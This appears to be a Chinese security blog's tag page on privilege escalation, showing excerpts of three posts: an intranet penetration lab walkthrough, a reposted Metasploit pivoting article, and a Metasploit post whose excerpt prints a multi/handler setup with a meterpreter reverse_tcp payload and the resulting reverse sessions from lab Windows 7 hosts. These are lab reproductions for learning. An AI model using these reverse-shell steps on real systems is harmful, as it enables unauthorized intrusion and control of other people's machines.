跳过正文
Rainwo’s Blog

提权

内网渗透靶场实践

·582 字·3 分钟
内网渗透-2 # 公众号上HACK学习呀上面的一篇内网渗透文章,收益颇多,本篇文章实验部分为自己重现 重现时遇到各式各样的奇葩问题,现均已解决 原文链接:https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw 靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 知识点 # st漏洞利用 phpmyadmin getshell tomcat 漏洞利用 docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透 环境配置 # 共三台靶机,导入到VMware中

MSF内网渗透

·2584 字·13 分钟
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 # 确定设备如何在不同网络之间相互传输的过程,也即通过互联的网络把信息从源地址传输到目的地址的活动被称之为路由。通常用于执行路由活动的设备被称为路由器。通过使用路由表,路由器则规划网络包到各自目的地的线路。路由的功能不仅仅是诸如路由器等网络设备能够完成,在安装有该功能的任意计算机系统也能够完成。 根据上图例子所示,为了在192.168.1.0/24与192.168.10.0/24网络之间进行通信是需要一个路由表记录的。根据路由器中的规则定义,数据需要从192.168.1.0/24源网络发到192.168.10.0/24目的网络中去。网络数据包大概会经历如下过程: 要访问的IP地址是否就在本地网络? 是否到达目的地 否则发送到网关 路由器接收到数据包就会查看其路由表

MSF提权操作

·650 字·4 分钟
最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行提权操作? 这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。 获得服务器shell # 首先我们在kali里面开启msf并调用exploit/multi/handler msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.142.19 lhost => 192.168.142.19 msf5 exploit(multi/handler) > set exitonsession false exitonsession => false msf5 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.142.19:4444 msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.24 [*] Meterpreter session 1 opened (192.168.142.19:4444 -> 192.168.142.24:52612) at 2020-10-30 10:15:32 +0800 msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.101 [*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.101:49230) at 2020-10-30 10:15:50 +0800 msf5 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WY-PC\WY @ WY-PC 192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128) 2 meterpreter x86/windows W-Y-PC\W-Y @ W-Y-PC 192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101) msf5 exploit(multi/handler) > 这里要特别注意两个位置: